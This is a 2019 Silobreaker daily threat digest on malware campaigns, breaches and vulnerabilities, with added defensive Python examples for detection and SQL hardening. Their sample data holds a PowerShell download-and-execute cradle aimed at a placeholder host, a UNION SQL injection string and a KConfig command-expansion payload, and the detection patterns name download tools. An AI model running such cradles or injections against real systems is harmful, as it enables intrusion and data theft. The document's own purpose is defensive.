Threat Reports

Silobreaker Daily Cyber Digest – 08 August 2019



Researchers publish analysis of password stealer Clipsa

  • Researchers at Avast analysed Clipsa, a multipurpose password stealer distributed as fake codec pack installers for media players that trick victims into running a malicious executable, which in turn drops the malware. Most infection attempts were observed in India, followed by the Philippines and Brazil.
  • Observed functions include replacing the cryptowallet addresses that victims copy, so that funds are sent to the threat actor’s wallet instead; searching for and stealing wallet data files; and installing a cryptocurrency miner.
  • Clipsa also uses infected devices to find vulnerable WordPress sites, which it then attempts to brute-force, sending any valid login details to its C2. The researchers believe the threat actor then steals further data from the compromised sites and may use them as secondary C2 servers.

Source (Includes IOCs)


URSNIF malware variant spread by malicious Word Document

  • Researchers at Fortinet discovered a new variant of the URSNIF malware that is spread via a malicious Word document containing VBA code. If the target enables macros, the VBA code runs PowerShell that connects to a URL and downloads URSNIF. The malware gathers information about the user’s system before sending it to the attacker’s C2.
  • The researchers stated that this campaign is still actively spreading. Fortinet’s report includes a comprehensive technical analysis of URSNIF.

Source (Includes IOCs)
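The infection chain above (Word document, VBA macro, PowerShell, URL download) leaves a recognisable trace in process-creation telemetry: a PowerShell process whose parent is an Office binary and whose command line carries a download cradle. The following is an added example, not Fortinet's code and not part of the digest, that applies that check to JSON-lines events. The field names (Image, ParentImage, CommandLine) are Sysmon Event ID 1 fields; the three sample events are constructed for the example, not exported telemetry, and the URL in them is a placeholder.

```python
"""Flag Office applications spawning script interpreters with download cradles."""
import json
import re
from typing import Iterable

# Parent/child pairs that match the macro -> PowerShell chain.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_CHILDREN = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                   "cscript.exe", "mshta.exe"}

# Command-line traits of a download cradle or a macro-launched interpreter.
CRADLE_PATTERNS = [
    re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|\bwget\b|\bcurl\b|start-bitstransfer", re.I),
    re.compile(r"-enc(odedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I),
    re.compile(r"-(nop|noprofile|w\s+hidden|windowstyle\s+hidden|ep\s+bypass|executionpolicy\s+bypass)\b", re.I),
    re.compile(r"https?://", re.I),
]


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(event: dict) -> list:
    """Return the reasons an event looks like an Office macro cradle; empty means benign."""
    reasons = []
    parent = basename(event.get("ParentImage", ""))
    child = basename(event.get("Image", ""))
    cmd = event.get("CommandLine", "")
    if parent in OFFICE_PARENTS and child in SCRIPT_CHILDREN:
        reasons.append(f"office parent {parent} spawned {child}")
        for pat in CRADLE_PATTERNS:
            if pat.search(cmd):
                reasons.append(f"command line matches /{pat.pattern}/")
    return reasons


def scan(lines: Iterable[str]) -> list:
    """Scan JSON-lines process-creation events and return one alert per suspicious event."""
    alerts = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        event = json.loads(line)
        reasons = classify(event)
        if reasons:
            alerts.append({"ProcessId": event.get("ProcessId"), "reasons": reasons})
    return alerts


# Constructed sample events (not real telemetry); field names follow Sysmon Event ID 1.
SAMPLE_EVENTS = r"""
{"EventId": 1, "ProcessId": 4120, "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "ParentImage": "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE", "CommandLine": "powershell.exe -nop -w hidden -c \"IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/u.ps1')\""}
{"EventId": 1, "ProcessId": 4133, "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "powershell.exe Get-ChildItem"}
{"EventId": 1, "ProcessId": 4140, "Image": "C:\\Windows\\System32\\cmd.exe", "ParentImage": "C:\\Program Files\\Microsoft Office\\root\\Office16\\EXCEL.EXE", "CommandLine": "cmd.exe /c dir"}
"""

if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS.splitlines()):
        print(alert["ProcessId"], "; ".join(alert["reasons"]))
```

The parent/child pair alone is worth an alert (the third sample, Excel spawning cmd.exe, fires on that basis only); the cradle patterns raise confidence rather than gate the detection, since a macro that launches PowerShell without a visible URL, for example via an encoded command, should still be surfaced.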


Ongoing Campaigns

New Android spyware found in campaign connected to MoqHao

  • McAfee researchers discovered new Android malware targeting Japanese and Korean users, distributed via the Google Play Store. Although the malware’s characteristics and structure differ from MoqHao, also known as Roaming Mantis, the researchers found common spy commands and the same crash-report key for a cloud service as MoqHao, which suggests a connection to the MoqHao phishing campaign from 2017.
  • The campaign directs users to a phishing page, reached through a DNS hijacking attack, which tricks them into installing the spyware. Japanese users are targeted via two fake Japanese security applications and Korean users via a fake Korean police anti-spyware application on the Google Play Store.
  • Once installed, the spyware attempts to collect device information, including the IMEI and phone number, and to steal SMS and MMS messages. The fake Korean anti-spyware app also accepts additional commands delivered via the Tencent Push Service.
  • Google has since removed the applications from the Play Store; however, the campaign is still ongoing.

Source (Includes IOCs)


Chinese news site used to deliver trojan

  • Researchers at Fortinet identified a campaign targeting users of an unnamed US-based Chinese news site. The unidentified attackers placed phishing links on the site that dynamically download scripts capable of executing arbitrary JavaScript.
  • The attack begins by attempting to exploit the WinRAR vulnerability CVE-2018-20250 and the Microsoft Office Equation Editor flaw CVE-2017-11882, the latter delivered via an RTF document. Successful exploitation allows the attackers to install a backdoor.
  • The backdoor was first discovered in 2017 and collects system information, screenshots, process lists, and data from certain applications. It can also be used to search for and download files. The researchers stated that the malware is still under development, as evidenced by its continually expanding list of functionalities.

Source (Includes IOCs)


Smominru cryptomining campaign now contains malware to steal access data

  • Carbon Black researchers identified that the Smominru cryptomining campaign now includes malware that allows the attackers to steal system access information from infected hosts. So far Smominru has infected over 500,000 devices, predominantly in the Asia Pacific region, Russia and Eastern Europe. The researchers dubbed this pairing of credential theft with cryptomining ‘access mining’.
  • While the Smominru campaign previously used only a modified version of XMRig to mine Monero, it now also uses readily available malware and open-source tooling, such as Mimikatz and EternalBlue, modified to suit the campaign’s purposes.
  • Furthermore, the researchers found an unexpected link between Smominru and the MyKings botnet: at one point both used the same email address to register domains. The researchers stated that this shows the threat actor is able to run multiple campaigns to perform access mining.

Source 1 Source 2


Fake DocuSign emails used in phishing campaign

  • Researchers at Cofense discovered a new phishing campaign targeting the credentials of users of all major email providers by sending emails purporting to be from the electronic signature service DocuSign. The emails originate from a domain hosted by the Germany-based hosting company Hetzner Online GmbH.
  • The fake DocuSign email contains a link that redirects the victim to a page offering login options for numerous well-known email providers. Once an option is clicked, the victim is redirected to the main phishing page.

Source (Includes IOCs)


Hacker Groups

FireEye publish deep-dive analysis of China-based APT41 group

  • APT41 have been operational since 2014, targeting organizations in the healthcare, gaming, high-tech, telecommunications, travel and media sectors. They have also been observed conducting surveillance operations for the Chinese government. They are reportedly well resourced, and their state-sponsored espionage activity runs in parallel with the group’s financially motivated activity.
  • The group uses a wide variety of malware families and tools: some are shared with other Chinese APTs, others are publicly available, and some are unique to APT41. They operate on both Windows and Linux systems and frequently target victims with spear-phishing emails. Once a system is compromised, APT41 can move quickly through the victim’s network; they are also persistent and respond quickly to network defenders.
  • They specialize in supply chain compromise, frequently stealing source code and digital certificates to sign their own malware. The researchers concluded that APT41 are ‘creative, skilled, and well-resourced’.



Leaks and Breaches

Neoclinical exposes medical data of over 37,000 individuals

  • Researchers at UpGuard discovered an exposed MongoDB database belonging to Australia-based Neoclinical, a company that matches individuals with ongoing clinical trials, containing the personal information of 37,170 users. The database was first discovered on July 1st, 2019, but it was not secured until July 26th, 2019.
  • The majority of affected individuals are in Australia and New Zealand. The exposed data included personal information such as names, email addresses, postal addresses with coordinates and dates of birth, as well as responses to questions about trials, which contain information on medical diagnoses, illicit drug use and treatments.



Unprotected database exposes data of 3.6 million Leadership for Educational Equity members

  • Security researcher Jeremiah Fowler discovered a non-password-protected Elasticsearch database with 5.2 million documents belonging to the US nonprofit organization Leadership for Educational Equity. The database was first discovered on July 27th, and public access was restricted on July 31st, 2019. It is unclear how long the database was exposed and whether it was accessed by unauthorized parties.
  • Exposed data included the personal details of roughly 3.6 million members, including names, addresses, genders, ethnic details, and more. No highly sensitive data, such as Social Security numbers or payment information, was exposed.



Truman Medical Centers hit with ransomware attack

  • Kansas City’s Truman Medical Centers suffered a ransomware attack on August 6th, 2019, which affected parts of its computer system. The hospital announced that it had agreed to pay ‘a small amount of ransom.’
  • The hospital also stated that patients’ personal health and financial information is stored on a separate system and has not been affected by the attack.



Two health vendors report separate data breaches

  • On June 20th, 2019, health vendors Medico and Amarin Pharma separately reported data breaches caused by misconfigured databases. Both databases were secured on the day they were discovered.
  • The Medico data breach exposed approximately 14,000 documents dating from 2018 of individuals whose medical business was processed by Medico. The data included bank details, insurance information, Social Security numbers, prescription histories, account names and passwords, and more.
  • The Amarin Pharma data breach exposed the full identifying information of approximately 78,000 patients. The data included patient names, contact information, the prescribing doctor, pharmacy information, insurance details, and more. The data had been exposed since May 2nd, 2019, and access or theft cannot be ruled out.



State Farm issues notice to customers following successful credential stuffing attack

  • State Farm are in the process of informing impacted customers that a criminal breached an unconfirmed number of accounts in a credential stuffing attack. The company stated that the first attack was detected on July 6th, 2019, and that attacks continued sporadically until July 22nd, 2019.
  • The company stated that the attacker confirmed valid username and password combinations, but it is not known whether these were used to log into any customer accounts. State Farm has reset the passwords of users impacted by the attack.
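Two login-abuse patterns appear in this digest: Clipsa brute-forcing WordPress logins from infected hosts (Threat Reports above) and the credential stuffing against State Farm accounts described here. They look different in a login log, and the difference decides the response: brute forcing is many attempts against one or two accounts from a source, credential stuffing is roughly one attempt per account across many accounts, and the accounts whose attempt succeeded are the ones whose passwords must be reset. The following is an added example, not State Farm's, Avast's or Silobreaker's code, that tells the two apart over a constructed login log; the log format, the ten-minute window and the eight-attempt threshold are assumptions for the example.

```python
"""Separate brute forcing from credential stuffing in web login logs."""
from collections import defaultdict
from datetime import datetime, timedelta

WINDOW = timedelta(minutes=10)   # look for bursts within this span (assumed)
MIN_ATTEMPTS = 8                 # ignore sources with fewer attempts in the window (assumed)


def parse(line: str) -> dict:
    """Parse one log line of the constructed format '<iso-ts> <ip> <method> <path> user=<u> status=<n>'."""
    ts, ip, method, path, *kv = line.split()
    fields = dict(p.split("=", 1) for p in kv)
    return {"ts": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"), "ip": ip,
            "method": method, "path": path,
            "user": fields.get("user", ""), "status": int(fields.get("status", "0"))}


def densest_window(events: list) -> list:
    """Largest run of a source's events that fits inside WINDOW (events sorted by time)."""
    best, j = [], 0
    for i in range(len(events)):
        while events[i]["ts"] - events[j]["ts"] > WINDOW:
            j += 1
        if i - j + 1 > len(best):
            best = events[j:i + 1]
    return best


def classify_sources(events) -> dict:
    """Per source IP: 'brute_force', 'credential_stuffing' or 'mixed', with counts and hit accounts."""
    by_ip = defaultdict(list)
    for e in events:
        if e["method"] == "POST":          # login submissions only, not page loads
            by_ip[e["ip"]].append(e)
    verdicts = {}
    for ip, evs in by_ip.items():
        burst = densest_window(sorted(evs, key=lambda e: e["ts"]))
        if len(burst) < MIN_ATTEMPTS:
            continue
        accounts = {e["user"] for e in burst}
        hits = sorted({e["user"] for e in burst if e["status"] < 400})
        if len(accounts) / len(burst) >= 0.8:
            kind = "credential_stuffing"   # about one try per account, many accounts
        elif len(accounts) <= 2:
            kind = "brute_force"           # many tries against one or two accounts
        else:
            kind = "mixed"
        verdicts[ip] = {"kind": kind, "attempts": len(burst), "accounts": len(accounts),
                        "successes": sum(1 for e in burst if e["status"] < 400),
                        "hit_accounts": hits}
    return verdicts


def constructed_log() -> list:
    """Synthetic login log built for this example; not a real capture."""
    base = datetime(2019, 7, 6, 2, 0, 0)
    lines = []
    # 203.0.113.7: nine failures then a success, all against 'admin' -> brute force
    for i in range(10):
        status = 200 if i == 9 else 401
        lines.append(f"{base + timedelta(seconds=20 * i):%Y-%m-%dT%H:%M:%SZ} 203.0.113.7 POST /wp-login.php user=admin status={status}")
    # 198.51.100.9: one try each against ten accounts, two of them valid -> credential stuffing
    for i in range(10):
        status = 200 if i in (3, 7) else 401
        lines.append(f"{base + timedelta(seconds=5 * i):%Y-%m-%dT%H:%M:%SZ} 198.51.100.9 POST /login user=user{i:02d}@example.com status={status}")
    # 192.0.2.4: a person mistyping once and then logging in -> below threshold, not reported
    lines.append(f"{base:%Y-%m-%dT%H:%M:%SZ} 192.0.2.4 POST /login user=alice@example.com status=401")
    lines.append(f"{base + timedelta(seconds=30):%Y-%m-%dT%H:%M:%SZ} 192.0.2.4 POST /login user=alice@example.com status=200")
    return lines


if __name__ == "__main__":
    for ip, v in classify_sources(parse(l) for l in constructed_log()).items():
        print(ip, v)
```

The hit_accounts list is the actionable output: for the stuffing source it names the accounts whose stolen password was confirmed valid, which is the set a provider resets, while for the brute-force source it is the single account that fell and should be locked and investigated.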



Starbucks database exposes nearly 1 million financial records

  • On April 8th, 2019, researcher Eugene Lim discovered a critical SQL injection vulnerability that exposed nearly one million financial records stored in a Starbucks database, including receipt, tax and payroll data. Lim was able to reach the database by sending an XML-formatted HTTP payload to the server.
  • Starbucks fixed the vulnerability on April 10th, 2019; it was publicly disclosed on August 6th, 2019.
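The point worth taking from this item is that the injection travelled inside an XML request body: a value parsed out of XML is attacker input like any other and must reach the database as a bound parameter, not by string concatenation. The following is an added illustration in Python with an in-memory SQLite database, not Starbucks' code and not Lim's actual payload; the table names, columns and the <request><store> element are invented for the example.

```python
"""XML-carried SQL injection: a string-built lookup beside its parameterised fix."""
import sqlite3
import xml.etree.ElementTree as ET


def make_db() -> sqlite3.Connection:
    """Constructed sample data: one table the endpoint should serve, one it must not."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE receipts (id INTEGER PRIMARY KEY, store TEXT, total REAL);
        INSERT INTO receipts VALUES (1, 'store-1001', 4.25), (2, 'store-1001', 9.80), (3, 'store-2002', 12.10);
        CREATE TABLE payroll (id INTEGER PRIMARY KEY, employee TEXT, salary REAL);
        INSERT INTO payroll VALUES (1, 'j.doe', 52000), (2, 'a.roe', 61000);
    """)
    return conn


def store_from_xml(body: bytes) -> str:
    """Extract the <store> value from an XML request body (hypothetical schema)."""
    root = ET.fromstring(body)
    return root.findtext("store", default="")


def receipts_vulnerable(conn: sqlite3.Connection, body: bytes) -> list:
    """The flaw: the XML value is spliced into the query text."""
    store = store_from_xml(body)
    sql = f"SELECT id, store, total FROM receipts WHERE store = '{store}'"
    return conn.execute(sql).fetchall()


def receipts_hardened(conn: sqlite3.Connection, body: bytes) -> list:
    """The fix: the same value is bound as a parameter, so it can only ever be a store name."""
    store = store_from_xml(body)
    return conn.execute(
        "SELECT id, store, total FROM receipts WHERE store = ?", (store,)
    ).fetchall()


# Constructed requests: a normal lookup and one carrying a UNION injection in the XML text.
BENIGN = b"<request><store>store-1001</store></request>"
INJECTED = (b"<request><store>x' UNION SELECT id, employee, salary FROM payroll --"
            b"</store></request>")

if __name__ == "__main__":
    conn = make_db()
    print("vulnerable, benign :", receipts_vulnerable(conn, BENIGN))
    print("vulnerable, injected:", receipts_vulnerable(conn, INJECTED))   # leaks payroll rows
    print("hardened,   injected:", receipts_hardened(conn, INJECTED))     # no rows
```

Against the injected body the string-built query becomes WHERE store = 'x' UNION SELECT ... FROM payroll --', and the payroll rows come back in place of receipts; the parameterised version treats the whole string as a store name and returns nothing. Note that escaping the XML layer does not help here: the quote passes through the XML parser unchanged, so the defence belongs at the SQL boundary.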




KDE Frameworks zero-day vulnerability patched

  • KDE has patched a command injection vulnerability disclosed by security researcher Dominik Penner by removing the feature that allowed shell commands to be expanded from values in KConfig files. The vulnerability was present in KDE as shipped by nearly all Linux distributions and could have been exploited with a specially crafted desktop file containing malicious code that executes when a user merely opens a folder containing it.
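Until a patched KDE Frameworks build is installed, a defender can at least find files that would trigger the expansion. KConfig marks keys whose values are to be expanded with the [$e] option (for example Icon[$e]=...), and the affected code expanded a $(command) in such a value by running the command. The following is an added scanner, not KDE's code and not Penner's proof of concept, that walks a directory tree for .desktop and .directory files and reports values that combine the [$e] marker with $( or backtick command substitution; the sample file contents are constructed to exercise the scanner and the touched path is a placeholder.

```python
"""Find .desktop/.directory entries that would make KConfig expand a shell command."""
import re
from pathlib import Path

# KConfig key options such as [$e] or [$ei] (expansion on); locale suffixes like [de] have no '$'.
EXPANSION_KEY = re.compile(r"\[\$[a-z]*e[a-z]*\]$", re.I)
# $(...) or backtick substitution inside a value.
SHELL_SUBST = re.compile(r"\$\(|`")


def findings_in_text(text: str, name: str = "<text>") -> list:
    """Return (file, line number, severity, message) tuples for one file's contents."""
    findings = []
    for n, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        # Skip blanks, comments, [Group] headers and lines without key=value.
        if not line or line.startswith("#") or line.startswith("[") or "=" not in line:
            continue
        key, value = line.split("=", 1)
        key = key.strip()
        expands = bool(EXPANSION_KEY.search(key))
        has_subst = bool(SHELL_SUBST.search(value))
        if expands and has_subst:
            findings.append((name, n, "high", f"{key} expands a shell command substitution"))
        elif expands:
            findings.append((name, n, "info", f"{key} uses KConfig expansion"))
        elif has_subst:
            findings.append((name, n, "low", f"{key} contains $( or a backtick but is not marked for expansion"))
    return findings


def scan_tree(root: str) -> list:
    """Scan every .desktop and .directory file below root."""
    out = []
    for p in Path(root).rglob("*"):
        if p.is_file() and p.suffix in (".desktop", ".directory"):
            out.extend(findings_in_text(p.read_text(errors="replace"), str(p)))
    return out


# Constructed .directory contents of the shape the advisory describes; the path is a placeholder.
SAMPLE_DIRECTORY_FILE = """[Desktop Entry]
Type=Directory
Icon[$e]=$(touch /tmp/kconfig-expansion-demo)
Name=Downloads
"""

if __name__ == "__main__":
    import sys
    root = sys.argv[1] if len(sys.argv) > 1 else str(Path.home())
    for f in scan_tree(root):
        print(*f, sep="\t")
```

Run it over home directories, removable media mount points and the Downloads folder, since a .directory file dropped into any folder a user browses is enough. The "low" findings are informational: a $( in a value that is not marked [$e] is not expanded by KConfig, but it is unusual enough in a shipped desktop file to be worth a look.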



WhatsApp decryption process allows attackers to spoof messages

  • Check Point researchers found that, once WhatsApp traffic is decrypted, the messages are serialised using the protobuf2 protocol. By converting that data to JSON the researchers were able to manipulate its parameters and developed three manipulation methods for private and group chats.
  • The first attack uses the quote feature in a group conversation to change the apparent identity of the sender; the second allows an attacker to alter the text of someone else’s reply in a group; and the third allows an attacker to send a private message to a group participant disguised as a public message, so that the target’s reply is visible to everyone in the group.
  • WhatsApp fixed the third vulnerability, but the first and second flaws can still be exploited.



General News

Security researcher claims Boeing 787 Dreamliner can be hacked

  • In September 2018, security researcher Ruben Santamarta discovered publicly accessible code on Boeing’s network relating to the Boeing 737 and Boeing 787. Analysis of the code led Santamarta to claim that a hacker could access the 787 Dreamliner’s in-flight entertainment system and move through the plane’s networks to compromise safety-critical systems.
  • Santamarta admits that he does not have the evidence to fully support his claim. Boeing denied Santamarta’s claims and described them as ‘provocative’ and ‘irresponsible’.



Criminal attempts to blackmail Binance with customer data

  • On August 7th, 2019, Binance informed customers that a hacker claimed to hold 10,000 photos of Binance Know Your Customer (KYC) data. Binance uses KYC data to verify customers, and it may include ID cards, driving licences and face scans. The attacker is demanding that Binance pay 300 bitcoin for the data.
  • The company refused to pay the ransom, and the attacker began leaking data via Telegram. The hacker has also been in contact with CoinDesk, who have seen the images and reported that they are related to a major Binance hack that occurred last year.
  • Binance stated that the images appear to date from February 2018, when a third-party vendor was handling data for KYC verifications.



The Silobreaker Team Disclaimer: Although Silobreaker has relied on what it regards as reliable sources while compiling the content herein, Silobreaker cannot guarantee the accuracy, completeness, integrity or quality of such content and no responsibility is accepted by Silobreaker in respect of such content. Readers must determine for themselves what reliance they should place on the compiled content herein.
